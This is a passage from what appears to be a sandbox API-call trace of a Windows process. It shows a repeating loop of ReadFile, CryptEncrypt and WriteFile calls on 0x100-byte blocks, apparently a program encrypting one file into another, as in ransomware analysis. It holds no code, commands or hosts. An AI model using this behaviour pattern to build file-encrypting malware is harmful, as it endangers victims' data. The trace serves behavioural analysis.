CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.149] GetLastError () returned 0x0 [0172.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.150] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.150] GetLastError () returned 0x0 [0172.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.150] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.150] GetLastError () returned 0x0 [0172.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.150] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.150] GetLastError () returned 0x0 [0172.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.150] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.150] GetLastError () returned 0x0 [0172.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.150] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.150] GetLastError () returned 0x0 [0172.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.150] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.150] GetLastError () returned 0x0 [0172.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.150] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.150] GetLastError () returned 0x0 [0172.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.151] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.151] GetLastError () returned 0x0 [0172.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.151] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.151] GetLastError () returned 0x0 [0172.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.151] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.151] GetLastError () returned 0x0 [0172.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.151] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.151] GetLastError () returned 0x0 [0172.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.151] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.151] GetLastError () returned 0x0 [0172.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.154] GetLastError () returned 0x0 [0172.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.154] GetLastError () returned 0x0 [0172.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.154] GetLastError () returned 0x0 [0172.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.154] GetLastError () returned 0x0 [0172.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.154] GetLastError () returned 0x0 [0172.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.154] GetLastError () returned 0x0 [0172.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.154] GetLastError () returned 0x0 [0172.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.155] GetLastError () returned 0x0 [0172.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.155] GetLastError () returned 0x0 [0172.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.155] GetLastError () returned 0x0 [0172.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.155] GetLastError () returned 0x0 [0172.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.155] GetLastError () returned 0x0 [0172.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.155] GetLastError () returned 0x0 [0172.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.156] GetLastError () returned 0x0 [0172.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.156] GetLastError () returned 0x0 [0172.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.156] GetLastError () returned 0x0 [0172.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.156] GetLastError () returned 0x0 [0172.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.156] GetLastError () returned 0x0 [0172.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.156] GetLastError () returned 0x0 [0172.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, 